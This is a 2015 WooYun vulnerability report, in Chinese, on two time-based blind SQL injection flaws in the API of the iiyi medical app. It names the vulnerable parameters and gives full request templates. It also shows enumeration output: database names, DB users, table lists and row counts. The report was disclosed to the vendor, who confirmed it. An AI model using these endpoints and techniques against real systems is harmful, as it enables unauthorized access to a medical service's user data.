当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148535

漏洞标题:快速问医生某站两枚延迟注入

相关厂商:快速问医生

漏洞作者: Hancock

提交时间:2015-10-22 09:56

修复时间:2015-12-10 09:14

公开时间:2015-12-10 09:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

快速问医生某站两枚延迟注入

详细说明:

1.
参数:uid

GET /zlzs/v6/other/chknum/?maxid=46670&version=62&tsid=0&uid=511340&signature=316fb0a67cacb068&os=2&uuid=862620029971316&type=today_case_update&channel=iiyi HTTP/1.1
Host: iapp.iiyi.com
Connection: Keep-Alive
Accept-Encoding: gzip


available databases [3]:
[*] information_schema
[*] test
[*] zhiye
current user: 'zhiye@%'


Database: zhiye
[51 tables]
+---------------------------+
| beitai_jkk |
| beitai_jkk_info |
| limit_class |
| log_login |
| url_120net |
| zhiye_admin_comment |
| zhiye_beitai_doc |
| zhiye_buy_path |
| zhiye_check_doctor_order |
| zhiye_click |
| zhiye_consults |
| zhiye_consults_copy |
| zhiye_dept |
| zhiye_dept_disease |
| zhiye_dept_disease_copy |
| zhiye_disease |
| zhiye_doctor_complain |
| zhiye_doctor_tags |
| zhiye_doctor_task_lv |
| zhiye_doctors |
| zhiye_doctors_certificate |
| zhiye_doctors_check |
| zhiye_doctors_copy |
| zhiye_doctors_interview |
| zhiye_doctors_msg |
| zhiye_doctors_picture |
| zhiye_doctors_remark |
| zhiye_doctors_replycount |
| zhiye_doctors_reward |
| zhiye_doctors_search |
| zhiye_doctors_symptom |
| zhiye_doctors_welcome |
| zhiye_domains |
| zhiye_drawings |
| zhiye_gratuitous |
| zhiye_hezuo_user |
| zhiye_notices |
| zhiye_order_mobile |
| zhiye_order_record |
| zhiye_orders |
| zhiye_orders_copy |
| zhiye_orders_ext |
| zhiye_orders_notes |
| zhiye_pay_card |
| zhiye_pay_feedback |
| zhiye_pay_order |
| zhiye_receive_msg |
| zhiye_relation |
| zhiye_replycount_mark |
| zhiye_safes |
| zhiye_thanks |
+---------------------------+


2.
参数fid,uid(ps:和上面的同站点不同数据库)

POST /zlzs/v6/applica/literaturelist HTTP/1.1
Content-Length: 149
Content-Type: application/x-www-form-urlencoded
Host: iapp.iiyi.com
Connection: Keep-Alive
Accept-Encoding: gzip
fid=1&version=62&uid=5113407&signature=316fb0a60d81351b&os=2&uuid=862620029971316&page=1&limit=10&channel=iiyi


available databases [3]:
[*] iiyicenter
[*] information_schema
[*] test
current user: 'iiyicenter@%'


不会python遇到延迟注入心好累的说

COUNT(*)
Database: iiyicenter
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| app_access_detail_old | 28473447 |
| dynamic_friends_0 | 20974637 |
| dynamic_aboutme_0 | 20970694 |
| dynamic_aboutme_9 | 20167989 |
| dynamic_friends_9 | 20160679 |
| dynamic_aboutme_8 | 19348024 |
| dynamic_friends_8 | 19341490 |
| dynamic_aboutme_6 | 19289556 |
| dynamic_friends_6 | 19282284 |
| dynamic_aboutme_4 | 19020399 |
| dynamic_friends_4 | 19012517 |
| dynamic_aboutme_7 | 18947158 |
| dynamic_friends_7 | 18940588 |
| dynamic_aboutme_1 | 18379309 |
| dynamic_aboutme_2 | 17805447 |
| dynamic_friends_2 | 17797747 |
| dynamic_aboutme_5 | 17711265 |
| dynamic_friends_5 | 17703381 |
| dynamic_aboutme_3 | 17270894 |
| dynamic_friends_3 | 17262676 |
| dynamic_friends_1 | 17191450 |
| app_access_detail | 13410757 |
| applica_downdetial | 7344028 |
| dynamic_autoid | 5641553 |
| dynamic_square | 5390616 |
| dynamic_0 | 4529266 |
| member_perfection | 2629138 |
| member_beans_detial | 2075829 |
| member_signin_detail | 2046058 |
| member_relation | 1476128 |
| applica_perdownload | 1416018 |
| member_base | 1215447 |
| home_access | 894350 |
| disease_tags_posts | 568732 |
| pms_detail | 469387 |
| disease_tags_sous | 451900 |
| pms_relation | 447857 |
| case_comment | 318711 |
| app_access_uuid | 303506 |
| sysnotice | 184563 |
| drug_to_action | 117059 |
| member_bbs_signin | 109220 |
| member_beans_tran_log | 109042 |
| disease_tags_bingli | 100580 |
| disease_tags_collection | 100002 |
| disease_tags_question | 99699 |
| drug_comp | 88940 |
| posts | 76745 |
| disease_tags_news | 60255 |
| euids | 50682 |
| case_myreply | 50157 |
| `case` | 42706 |
| topic_comment | 33942 |
| disease_tags_case | 33914 |
| member_image | 31925 |
| topic_myreply | 30516 |
| member_certification | 27869 |
| base_hospital | 26701 |
| case_images | 25237 |
| thread_support | 23019 |
| sysnotice_mine_6 | 21972 |
| case_icons | 21084 |
| sysnotice_mine_0 | 20102 |
| sysnotice_mine_5 | 19979 |
| case_collection | 19960 |
| sysnotice_mine_9 | 18610 |
| sysnotice_mine_1 | 18547 |
| sysnotice_mine_4 | 17783 |
| sysnotice_mine_2 | 17278 |
| sysnotice_mine_7 | 17156 |
| sysnotice_mine_3 | 16981 |
| sysnotice_mine_8 | 15971 |
| threads | 15268 |
| applica_content | 12579 |
| dynamic_tiny | 10000 |
| dynamic_mine_0 | 8741 |
| drug_action | 8527 |
| dynamic_mine_3 | 8357 |
| dynamic_mine_5 | 8191 |
| dynamic_mine_4 | 8102 |
| dynamic_mine_2 | 7934 |
| dynamic_mine_1 | 7690 |
| dynamic_mine_9 | 7496 |
| dynamic_mine_6 | 7401 |
| dynamic_mine_7 | 6745 |
| dynamic_mine_8 | 6668 |
| member_invitecode | 6582 |
| topic_comment_support | 5606 |
| topic_collection | 4617 |
| disease_tags_look | 3556 |
| topic | 3336 |
| base_area | 3230 |
| hotmed | 3058 |
| case_comment_support | 2929 |
| tupu_images | 2434 |
| disease_tags_guide | 2415 |
| feedback | 2379 |
| flash | 1948 |
| guide_collection | 1812 |
| topic_images | 1410 |
| disease_tags | 1245 |
| guide | 1187 |
| flash_collection | 1079 |
| dynamic_comment_0 | 1040 |
| beans_order | 1016 |
| app_counts | 973 |
| literature | 921 |
| tupu_class | 803 |
| tupu_class_copy | 803 |
| advertise_static | 772 |
| tupu_copy | 762 |
| tupu | 760 |
| applica_sort | 740 |
| member_certification_ask | 688 |
| member_invite_mobile | 535 |
| it_topic | 454 |
| app_coupon | 371 |
| it_images | 306 |
| it_comment | 234 |
| member_groups | 196 |
| flash_comment | 161 |
| flash_images | 119 |
| disease_tags_topic | 110 |
| dayly_news | 94 |
| app_login_faild | 48 |
| app_dbversion | 47 |
| flash_comment_support | 45 |
| band_records | 29 |
| disease_tags_types | 28 |
| case_noallow | 24 |
| literature_sort | 21 |
| flash_sort | 12 |
| applica_dbversion | 10 |
| company | 9 |
| case_admin | 7 |
| site_var | 6 |
| tupu_class_type | 5 |
| advertise | 3 |
| app_activety | 2 |
| member_black | 2 |
| case_icons_log | 1 |
+--------------------------+---------+

漏洞证明:

修复方案:

删了吧、

版权声明:转载请注明来源 Hancock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-26 09:13

厂商回复:

确认漏洞,感谢朋友!

最新状态:

暂无


漏洞评价:

评价